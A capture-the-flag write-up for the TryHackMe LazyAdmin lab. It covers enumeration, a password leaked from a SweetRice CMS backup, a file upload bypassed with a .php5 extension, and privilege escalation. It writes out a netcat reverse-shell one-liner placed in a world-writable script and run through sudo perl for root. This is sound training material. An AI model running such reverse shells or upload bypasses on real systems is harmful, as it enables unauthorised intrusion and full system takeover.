ctfwriteup.com
Search…
⌃K

TryHackMe - LazyAdmin (Easy)

Summary

Gobuster finds a hidden directory /content that leaks CMS name. Searchsploit finds an exploit that leads us to a MySQL backup file, which leaks admin user's password hash. The password hash is just MD5 and we recover the plaintext password easily. Running Gobuster on /content , we find another hidden directory /content/as that has a login form. Using the leaked credential, we can access the admin panel.
In the admin panel, we find a file upload vulnerability and an easy file extension bypass. Upload php-reverse-shell.php5 and get a reverse shell as www-data.
In the privilege escalation phase, sudo -l finds that we are able to execute Perl as root. There is a backup script that executes /etc/copy.sh as root and /etc/copy.sh is world-writable. Store a Netcat reverse shell payload in it and run sudo perl on the backup script. Then we catch a reverse shell as root.

IP

  • RHOST: 10.10.10.20
  • LHOST: 10.13.12.2

Nmap

Nmap

Asset Discovery

Gobuster finds a hidden directory /content:
Gobuster
Visit http://lazyadmin.thm/content/. The CMS used is SweetRice:
SweetRice

Admin Panel: Leaked Credential from MySQL Backup

Searchsploit:
searchsploit
The "Backup Disclosure" PoC says that MySQL backup is at /inc/mysql_backup. In our case, it is at /content/inc/mysql_backup. Try to access this directory:
/content/inc/mysql_backup
The manager user's password hash is leaked in this backup:
Password hash
MD5 reverse hash lookup shows that the plaintext password is Password123, so the credential is manager:Password123. Now we need to find a login page to utilize this credential.
Run Gobuster on the directory /content and we find a new directory /content/as:
Gobuster on /content
This directory has a login form:
/content/as
Try the credential we just found and now we have access to the admin panel:
Admin Panel

www-data Shell: File Upload

There is an arbitrary file upload exploit for SweetRice:
Arbitrary file upload
It suggests .php5 bypasses the filter:
.php5
Rename php-reverse-shell.php to php-reverse-shell.php5, go to "Media Center", and upload it:
File upload
Start a pwncat listener and catch a reverse shell as www-data:
www-data shell

Privilege Escalation: Sudo Perl => World-Writable File => Reverse Shell

sudo -l:
sudo -l
The file /home/itguy/backup.pl executes sh /etc/copy.sh as root and /etc/copy.sh is world-writable:
/etc/copy.sh
Store a Netcat reverse shell payload is /etc/copy.sh:
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.12.2 1337 >/tmp/f' > /etc/copy.sh
Start a pwncat listener and execute backup.pl as root:
sudo /usr/bin/perl /home/itguy/backup.pl
Now we have a root shell:
root shell
Previous
TryHackMe - UltraTech (Medium)
Next
TryHackMe - Anonymous (Medium)
Last modified 8mo ago